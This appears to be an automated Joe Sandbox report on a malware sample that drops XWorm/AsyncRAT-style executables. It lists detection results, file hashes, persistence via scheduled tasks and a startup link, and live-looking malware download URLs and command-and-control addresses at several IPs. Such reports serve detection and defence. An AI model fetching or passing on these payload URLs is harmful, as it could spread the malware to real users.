                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\EJQ2xs8[1].exe100%AviraHEUR/AGEN.1313526
                    C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe100%AviraHEUR/AGEN.1313526
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Roaming\github.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\EJQ2xs8[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exe55%ReversingLabsByteCode-MSIL.Trojan.XWorm
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe45%ReversingLabsWin32.Trojan.Symmi
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\EJQ2xs8[1].exe32%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe55%ReversingLabsByteCode-MSIL.Trojan.XWorm
                    C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe32%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Packed.Themida
                    C:\Users\user\AppData\Roaming\github.exe55%ReversingLabsByteCode-MSIL.Trojan.XWorm
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    179.43.171.2090%Avira URL Cloudsafe
                    http://31.41.244.11/files/1824233174/EJQ2xs8.exeXYZ01234567890%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exe90%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exeO0%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exe610%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exe/185.215.113.16/luma/random.exeSSC:0%Avira URL Cloudsafe
                    http://31.41.244.11/files/1824233174/EJQ2xs8.exe100%Avira URL Cloudmalware
                    http://185.215.113.16/luma/random.exea50%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exe8(0%Avira URL Cloudsafe
                    http://31.41.244.11/files/1824233174/cAvEmnl.exeXYZ01234567890%Avira URL Cloudsafe
                    http://185.215.113.16/fac00b58987e8e7e7b9ca30804042ba5ce9-10020%Avira URL Cloudsafe
                    http://185.215.113.16/S0%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exe10107140010%Avira URL Cloudsafe
                    http://31.41.244.11/files/1824233174/cAvEmnl.exe100%Avira URL Cloudmalware
                    http://185.215.113.43/Zu7JuNko/index.php/luma/random.exe450100%Avira URL Cloudmalware
                    http://31.41.244.11/files/1824233174/cAvEmnl.exeNsz0%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exeAppDataBs0%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exe7140010%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exeAppData0%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exeT0%Avira URL Cloudsafe
                    http://185.215.113.16/luma/random.exeLMEMPp0%Avira URL Cloudsafe
                    http://185.215.113.16/c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce9024154m0%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    179.43.171.209true
                    • Avira URL Cloud: safe
                    unknown
                    http://185.215.113.16/luma/random.exefalse
                      high
                      http://185.215.113.43/Zu7JuNko/index.phpfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://185.215.113.43/Zu7JuNko/index.phpVskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://185.215.113.16/luma/random.exe61skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://31.41.244.11/files/1824233174/EJQ2xs8.exeskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.16/luma/random.exea5skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.16/luma/random.exe/185.215.113.16/luma/random.exeSSC:skotes.exe, 00000006.00000002.2896207218.000000000159A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.16/luma/random.exe8(skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.16/luma/random.exe9skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://31.41.244.11/files/1824233174/EJQ2xs8.exeXYZ0123456789skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://31.41.244.11/files/1824233174/cAvEmnl.exeXYZ0123456789skotes.exe, 00000006.00000002.2896207218.00000000015ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.16/luma/random.exeOskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.16/Sskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.43/Zu7JuNko/index.phpNskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://185.215.113.16/fac00b58987e8e7e7b9ca30804042ba5ce9-1002skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://185.215.113.16/luma/random.exe1010714001skotes.exe, 00000006.00000002.2896207218.0000000001657000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://31.41.244.11/files/1824233174/cAvEmnl.exeskotes.exe, 00000006.00000002.2896207218.00000000015C0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2896207218.00000000015ED000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://31.41.244.11/files/1824233174/cAvEmnl.exeNszskotes.exe, 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://185.215.113.16/skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://185.215.113.43/Zu7JuNko/index.php6skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://185.215.113.16/luma/random.exeAppDataBsskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.215.113.43/Zu7JuNko/index.php/luma/random.exe450skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.16/luma/random.exe714001skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.215.113.16/luma/random.exeTskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.215.113.16/luma/random.exeAppDataskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.215.113.16/luma/random.exeLMEMPpskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.215.113.16/luma/random.exelencodedskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://185.215.113.16/luma/random.exepskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://185.215.113.43/Zu7JuNko/index.phpdskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://185.215.113.16/luma/random.exeoskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://185.215.113.43/Zu7JuNko/index.phpjskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecAvEmnl.exe, 00000007.00000002.2895978891.0000000002491000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://185.215.113.16/c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce9024154mskotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://185.215.113.43/Zu7JuNko/index.php0skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              185.215.113.43
                                              unknownPortugal
                                              206894WHOLESALECONNECTIONSNLtrue
                                              179.43.171.209
                                              unknownPanama
                                              51852PLI-ASCHtrue
                                              185.215.113.16
                                              unknownPortugal
                                              206894WHOLESALECONNECTIONSNLfalse
                                              31.41.244.11
                                              unknownRussian Federation
                                              61974AEROEXPRESS-ASRUfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1565749
                                              Start date and time:2024-11-30 18:06:06 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 6m 37s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:file.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@13/12@0/4
                                              EGA Information:
                                              • Successful, ratio: 42.9%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target EJQ2xs8.exe, PID 7668 because it is empty
                                              • Execution Graph export aborted for target file.exe, PID 7316 because it is empty
                                              • Execution Graph export aborted for target skotes.exe, PID 7520 because there are no executed function
                                              • Execution Graph export aborted for target skotes.exe, PID 7636 because there are no executed function
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: file.exe
                                              TimeTypeDescription
                                              12:08:01API Interceptor916x Sleep call for process: skotes.exe modified
                                              12:08:14API Interceptor39x Sleep call for process: cAvEmnl.exe modified
                                              12:08:18API Interceptor1x Sleep call for process: github.exe modified
                                              12:08:31API Interceptor1x Sleep call for process: EJQ2xs8.exe modified
                                              17:06:59Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              17:08:17Task SchedulerRun new task: github path: C:\Users\user\AppData\Roaming\github.exe
                                              17:08:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\github.lnk
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              185.215.113.43file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadeyBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, NymaimBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              179.43.171.209file.exeGet hashmaliciousXWormBrowse
                                                file.exeGet hashmaliciousXWormBrowse
                                                  185.215.113.16file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16/off/def.exe
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.16/mine/random.exe
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.16/luma/random.exe
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16/off/def.exe
                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                  • 185.215.113.16/well/random.exe
                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                  • 185.215.113.16/off/def.exe
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16/off/def.exe
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16/off/def.exe
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.16/mine/random.exe
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16/off/def.exe
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  PLI-ASCHfile.exeGet hashmaliciousXWormBrowse
                                                  • 179.43.171.209
                                                  file.exeGet hashmaliciousXWormBrowse
                                                  • 179.43.171.209
                                                  H4IoDDh3Rv.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                  • 176.223.112.134
                                                  wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                  • 179.43.171.197
                                                  o4QEzeCniw.exeGet hashmaliciousUnknownBrowse
                                                  • 179.43.182.252
                                                  http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9Get hashmaliciousUnknownBrowse
                                                  • 81.17.20.50
                                                  Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                  • 179.43.180.122
                                                  Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                  • 179.43.180.122
                                                  Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                  • 190.211.254.101
                                                  Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                  • 190.211.254.192
                                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exefile.exeGet hashmaliciousXWormBrowse
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exefile.exeGet hashmaliciousXWormBrowse
                                                      Process:C:\Users\user\AppData\Roaming\github.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):654
                                                      Entropy (8bit):5.380476433908377
                                                      Encrypted:false
                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                      Process:C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):522
                                                      Entropy (8bit):5.358731107079437
                                                      Encrypted:false
                                                      SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                      MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                      SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                      SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                      SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):52736
                                                      Entropy (8bit):6.560412971442069
                                                      Encrypted:false
                                                      SSDEEP:1536:J/mQgB/wjBHgXOo6PF09a3Yu2u29Pp9/D9gSFovbnlgZFO/86c9p:J/mzBIlAe3WuMzr9vFovbnmFO/54
                                                      MD5:EFD5937F50C21B5CE660D67F3F995821
                                                      SHA1:28C4A690949E1A798904C67A869E33EC0F70BA13
                                                      SHA-256:5A09D23637929D77E9C04322D800690BC6E7272E0755843F387C37B99F452FB8
                                                      SHA-512:13E092E75FD3FCF2DAFCE1E186F6583DF1F562FFEBC5F45CDF80A21F2DEA25DC96E1535194E393B94153E2D41CB8B0E86B7835CB918FB278E119486836BC1CD9
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r0Kg.....................@.......`...`... ....@.. .......................`............@.................................T...W.... .......................@.......................................................`..................H...........U@...7'.@6... ...8..................@...XejnR........`.......<.............. ..`.text...............>.............. ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1848320
                                                      Entropy (8bit):7.949654150885944
                                                      Encrypted:false
                                                      SSDEEP:24576:m48EC0lEEEJDJVQhatQvxRUBfTyL0CmQlzQ7DwKxJEPGyQN2mV6gzqx1vH3M+3xg:DCeXEJrev1LhFQ/wvGKhg0f3Mibr
                                                      MD5:D39ABBE51442F47BD2736EB7C6CB60C3
                                                      SHA1:1F3BCA8CD4BEB9E197381E66264885E5D7925C5F
                                                      SHA-256:D9DD2EF8BD0F684AB255058C6C964CF9102C06B3727AB5B6A84CED20CC7687DA
                                                      SHA-512:2D834AFAE15F1B2EBFF69813C169E566BD65229F3FE56F3A69A7EC2ED0FABD44B9E6A9149A18A3194F5C4CFC57A0FA35EDEC90CB7A4C0D9D1BDD6E6FE6933FDB
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 45%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...B3Gg.............................`I...........@...........................I.....d.....@.................................\`..p....P.......................a...................................................................................... . .@.......X..................@....rsrc........P.......h..............@....idata .....`.......j..............@... .@*..p.......l..............@...enyyijut....../......n..............@...ijrsozmw.....PI.....................@....taggant.0...`I.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1723904
                                                      Entropy (8bit):7.9350018891587055
                                                      Encrypted:false
                                                      SSDEEP:49152:KQ4SuBDQC/lhGT3uXQqxxi0se9ZqMUO7kF:2S8QilVXBwgq
                                                      MD5:7AC5198E128DEDA55EEEB6CCFC8B57EA
                                                      SHA1:96B58D89DDFEDDA3DC8DAEBB4391ABE40843253E
                                                      SHA-256:887A2E09A1E373AD3F5224A8464B0E5B4EBE4A344958C2D9C91CBD42A54F1241
                                                      SHA-512:806E4CBF2B47AFF1E0BFB89FA13D55D10290C4CABB97E675808F3DBDCB7633D8FD97FC10619EFD1C0EE8D11A0C15C0604CCFC32D9A60979542A5235087127818
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                      Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r0Kg.................~........... D.. ........@.. .......................`D..........@.................................U...i.......8........................................................................................................... . ..... ...@... ..............@....rsrc...8............`..............@....idata . ...........d..............@... .`)..........f..............@...dvpnmyli.....@*......h..............@...lhlewnhz. ....D......(..............@....taggant.@... D.."...,..............@...........................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):52736
                                                      Entropy (8bit):6.560412971442069
                                                      Encrypted:false
                                                      SSDEEP:1536:J/mQgB/wjBHgXOo6PF09a3Yu2u29Pp9/D9gSFovbnlgZFO/86c9p:J/mzBIlAe3WuMzr9vFovbnmFO/54
                                                      MD5:EFD5937F50C21B5CE660D67F3F995821
                                                      SHA1:28C4A690949E1A798904C67A869E33EC0F70BA13
                                                      SHA-256:5A09D23637929D77E9C04322D800690BC6E7272E0755843F387C37B99F452FB8
                                                      SHA-512:13E092E75FD3FCF2DAFCE1E186F6583DF1F562FFEBC5F45CDF80A21F2DEA25DC96E1535194E393B94153E2D41CB8B0E86B7835CB918FB278E119486836BC1CD9
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 55%
